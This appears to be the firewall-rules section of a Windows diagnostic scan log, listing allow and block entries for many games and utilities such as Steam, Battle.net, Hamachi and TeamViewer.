FirewallRules: [{2E3E76CC-A240-4BC9-B75D-B21DA2449E27}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{4AFEF7FC-5364-4559-B298-316BF152B16B}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [UDP Query User{B9880637-F1BB-4C85-9925-0C3923E020A5}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [TCP Query User{CDDFC1AC-FBDD-43A7-9C65-2D0964B25B74}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{8D82C04F-BF9A-4701-B315-1F3B967766F3}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{627D9905-8B9E-47FF-A117-17E145D698DC}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{5DBF1606-7F85-4C2C-824E-EDFC11BD990D}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{FFDBE546-B8A5-49BE-90B7-42976EBA4237}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E6FA73F3-7E35-4D33-9FE2-82ED8D6F4AFC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{8D467693-5B77-4BE8-AE9C-0E9B563FFEAE}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{18C8350D-3057-4C5F-BAD2-725D1C1DECE7}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [TCP Query User{55EF3563-1C59-42E3-A4F0-9444A74C3E45}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{5C7C4B4A-69D3-483D-8A9C-DED0AC778BCD}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [{45C6EBB6-3B50-46EE-8980-667A09FCEBD8}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{828A5790-20F0-4956-BEB8-5409DF94B749}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{73B9B64C-3636-4CFD-A396-519632DF134D}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{28448C4B-6FAC-45AB-AAF2-7B85D28E66AA}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [TCP Query User{1EC0261B-37E5-4385-B272-9F7BEB055D4F}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{759BC82D-B0DC-4F60-8BF7-9B7C657D9AD8}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [TCP Query User{0EF4E498-8DB1-439E-B6AA-EAB36450D94B}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{D7B1A737-8140-4BF3-A072-18BB4055E961}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{E900344C-C1D2-4B5A-8C5E-A2FA76B69DCF}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{A5CC0085-DDB9-46E6-9D7F-C3D29ADFC80B}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{CE40884C-D69D-4465-979B-BA4B30B9422E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [{266CFBBD-8D67-4C75-979F-4A9A8AB47588}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [TCP Query User{DEF1856C-BB33-44D0-93E7-9412C14515BA}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{54A34DA2-9A0B-4380-A28B-AB3B5CCF882F}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{61949EEE-5F62-40E1-80A6-E35482F3B71D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{0CDB1C6D-EC84-4F79-BE49-01DA29FC333D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{88C5EC1F-9F0C-4BC6-969B-98A5B600471E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{1C04E8C1-5BE1-41A4-A81D-744CA624EC02}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E5B4D7C5-07BE-4454-BF77-0EB6C80047D4}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D4211A51-4CEC-4289-B7A1-430D4D240889}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9B851F42-1FC8-41E4-8FEE-20948E6A2EE2}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{977CFC13-A7A2-4185-BC37-56982093CA7C}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{B9F172E7-6FA5-4EC8-A9CA-3F8595D0E566}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{9E83C0FE-4B23-463A-B83E-2EB3EAE5F80F}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{53E8919F-68FF-4BA8-8522-FA2F5301F9D2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{0461EBF1-7790-46AD-9455-39076D092A87}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{91EE7751-797C-4734-A64E-422748E809CF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9147620D-AC70-4F7B-9DC6-14750D3EA729}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{6D2F2A72-BAF3-4580-ABD1-490BF2F2FD5C}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{35458669-7E78-4505-8146-C2DC82096E56}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{6C0610D3-B27F-4795-BFE9-09046B8D93A4}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [{32B5C767-EA76-4FA6-8B6B-941A767CB7FF}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [TCP Query User{115CC196-11CD-4A9A-848A-6938D2300FEC}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [UDP Query User{31028D38-37E1-4AE1-A4D3-E17A7827C183}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [TCP Query User{D26D34ED-C6DC-4548-8E4A-F9B1D8C9F3D4}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [UDP Query User{3BF9E913-01AA-4CD6-9791-02D20E6E21B3}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [TCP Query User{D194207E-DDFD-4627-A0FC-BE2AEDBF6E7E}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [UDP Query User{F24EFC90-BBE5-41F9-9D0E-E8B90B1940EF}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [{E543B941-B036-4E0B-8C3A-402A4504914E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D6A8053A-49C3-49B7-8F59-73AEE955C61F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{FAC44A78-780D-426C-AF18-E1732DB54315}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{C6840C5F-EED4-40C0-B62C-09EA5DDF5C54}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{1AF22D79-FBE2-403D-8EB4-89EC28BFB2D2}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{D1C3AB65-7BCE-4E3F-B7E3-702CE1A76B6F}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{7C9C72EB-F655-4B26-80A3-872C50D6C853}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{CC7899A3-3B5F-4AA2-ADFB-0DFA2664FC0B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{F611C6D4-FBAC-498B-950F-DF8B93E825BB}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{C6B12067-A165-42B4-8493-1427A24499EF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{352241C8-F360-47FD-BB61-A99048135DF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{1F00559E-8678-4CA4-80D8-F4828CDE89AA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{80DCBFFD-115F-4B87-8D59-93ACF03B341D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{3294C900-CB00-4E0F-BC69-4821E9831571}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{93986157-C87E-4AFE-96A8-FD7CD0ABD567}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{809F66C2-6701-4313-8B10-7B8BD900866B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{4FC1668A-CB01-4DD7-9DAE-C7F25A440247}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{1E88176E-755C-4681-BBD0-B30DC3F068D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{79792EA2-C9DE-4298-926B-BC90F3195376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{84979D94-0AEB-46C3-969C-9B16766CB14C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{0842EC48-341B-4BE5-8806-F895B1A02DD5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [{5876B581-FA66-4BC7-8A00-35BF03AB8A02}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [TCP Query User{F9D61A2D-DF6B-46D6-A53E-2E436D01180B}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [UDP Query User{70A3BEC4-CD11-4C95-83F5-225D9ED47A26}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [{1B617450-991D-493F-A0A4-83E61FCBBDE4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{92B52AA9-B01C-45B5-92CB-A8217B8519A5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{0966B62F-5434-423E-960F-43C13E70704B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{72CD6C0C-FB9C-4D1F-B641-7BC04AFBBE64}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{A8BDD7FA-BD06-4D31-9129-C0379C81A7DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{C5D12B7B-9A5B-4D13-A3D0-97737CF55F3B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{6F611789-7AF0-4311-A413-5BD1E442E6F2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{7EE7CEF0-CC26-421D-852B-A41EB04AAA74}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{F5C461FF-689E-4533-A67F-75367B56F40C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{E398CD22-4D44-47F8-9C19-9A06B908F24B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [TCP Query User{D6794F86-C0B5-4AEA-AB6B-FA39747E18C8}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [UDP Query User{A6FE6FA7-0813-4DCE-BEF2-5818F72B3519}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [{F489B2AD-61AC-4BD0-9F21-DD536D182F20}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{2BE4269B-F03C-40EA-8C01-4EFE73ADD5A8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [TCP Query User{D4318ABC-EC68-4A88-830A-689E6DD21C84}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [UDP Query User{1456890F-4AA7-4A15-B12A-19A0BB3F99F7}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [TCP Query User{B581FB4E-4169-4D34-B684-8EB647EB97DD}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{4F52FEA6-04DD-4CC9-BCD4-90E15D3600BB}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{8CFF32A0-B686-4BDB-A678-E53ED8DD54BD}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [UDP Query User{63D32474-73BA-4E2C-BF1B-530850F77567}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [TCP Query User{5F8388FA-07B6-46FA-A85A-BDC61AEB2896}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [UDP Query User{EAE8ECFA-BA38-4F2A-B311-F74C7B6A09DD}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [TCP Query User{D04B26D3-05BF-4467-96C6-F5EFCEA9A568}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{ECD07AB0-51C7-415D-8B98-F1A1FC702136}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{814455B8-D927-4DF5-B1FE-25FFAB4E2FE7}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [{3FF9881D-DCDE-42EA-B1E9-4D0465089615}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [TCP Query User{D599766A-387D-4295-A977-8A7C4CD34D2F}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [UDP Query User{547CD1BA-D1F9-4CA9-B13D-B5840050F926}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{DE6C67B3-404F-4E00-A294-F9A4AFC2C855}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{A388931D-F8A0-43AF-A9EE-3F2F1AB0D802}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{AC075F6A-A440-4B5B-8C6E-20668B72EA5D}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [UDP Query User{47E95813-C968-481B-8401-A9F5423D9339}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [TCP Query User{F88826EC-C4A7-4998-88F7-040A1DA49F26}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [UDP Query User{472ABE4E-8E97-428A-8634-C1F1221B2FC9}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [TCP Query User{A736D87A-8B4B-4C3F-A866-FC053951B367}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{4429C094-F675-4E39-8432-D6A974B313F6}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [{A31C0C9A-75B1-46E2-A560-D31AB2D27833}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{AEB337AC-F838-4B4B-8816-B72BEED7EC99}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [TCP Query User{24C29AC6-88E3-4A95-8C8F-45C5B9FE3A52}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [UDP Query User{2093AE12-66BF-4861-87C2-F3A96265073F}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{79D77E57-3EE3-4C09-B530-4B3CE5BFAE9D}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [UDP Query User{9FBEF8B5-46DC-4444-A23C-6D11B088A8F3}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [TCP Query User{F66A678C-7B64-473D-8FC8-06201AADC062}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [UDP Query User{83CBDA9A-1575-490B-AB9F-D26497F68829}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [{84873599-EC78-4B38-A255-15EBC0FC2EA4}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [{4398A2A4-113B-4DC7-BEE3-C1A06EF2761E}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [TCP Query User{919F3E59-577F-44C2-AF6C-D2415892A34F}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [UDP Query User{DB90A332-F5EA-49D2-8E43-FCC154C6F37D}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [{5356E309-436E-4CF2-8A99-9856AF496BB4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{6A61A7BD-6C5A-4910-919B-EC0FC525542A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [TCP Query User{FC0B950D-598B-4C27-A099-212AF8985044}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [UDP Query User{00E00E8D-85F0-4758-87E9-221252409F6D}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [{443644FB-CA4F-4265-80E1-2401DC456AA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{90227DFB-A226-4335-8C83-E4E636125810}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{9DB566C5-FE69-4D9B-9888-9BA9DA0FF55F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [{4586C9AA-F881-469D-83C9-0740267F80EE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [TCP Query User{562D9B3F-FF37-4838-A818-95867EC2F001}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [UDP Query User{35EA472F-9B38-4741-A493-C0E2D320595F}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [TCP Query User{B1446DB0-ECE7-48AC-882B-A2749E82368B}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [UDP Query User{B91C6D26-E31D-4DEF-BADB-CD74BA9FDDA1}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [TCP Query User{7469F425-6C13-47A9-BA48-5D46998357C7}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [UDP Query User{E94231AC-F983-4BAF-94F9-E888E0ED0C22}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [TCP Query User{D8F1C82F-6331-486C-B1BA-DDA2C8C2352B}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [UDP Query User{561641AD-D5E2-4C02-8785-0EA2474ADFE1}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [{C1488CAF-3F1D-4CBE-AC47-2287B7FDD3DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{70A5D689-38BB-4673-A25F-19B5D3D737E6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{38996998-D368-4063-98C0-E06AEB44023C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{D6C44EC6-3F87-48CE-BAB8-E211A9DBC273}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{02F07D3E-F3C3-4053-9743-D91FC25BFE3D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{8164E9B5-1CD4-4DEE-973A-2044F5D60E5F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B0415D83-40EB-4823-ABD4-12D1066AB19E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{722FA4B4-31E2-4F37-AD00-61F59C03A845}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{6F83E4F5-AAA5-42DE-8F9D-FBB0BEB63EFC}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [UDP Query User{DB911C0D-75DB-45A8-86F6-9EF94D76AD42}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [TCP Query User{2351E6A2-122B-4E05-905A-88BDBF6DB57E}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [UDP Query User{A9B82257-97FF-426A-8632-55C2E5532F54}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [TCP Query User{45050945-6D3F-4D57-9CC8-FDA007D83A8B}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [UDP Query User{E7B05CD4-74AA-40C8-9E10-7961E53F21DF}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [{DC297BE2-B8D3-4C65-B87D-B63DC2C73B88}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{45C1643D-955A-4777-BE45-9ABDA65D7E07}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{A57A95CC-8712-4768-A828-D5C7A3C090F3}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [UDP Query User{69952427-AF52-443D-A4E1-70B140A97672}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [TCP Query User{16122460-E2CD-4566-B5DC-42712F3DE8EF}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [UDP Query User{5ECF7D77-E9FA-477D-A7E7-D7ED39C5A5F2}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [{A8D5F529-DCD1-4FDA-BAB7-21D75192F6DA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [{F73EF0DE-71F6-4D78-A751-ADBD04752DF9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [TCP Query User{6874CB65-0F5F-487E-96D2-2E9D41C236F5}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
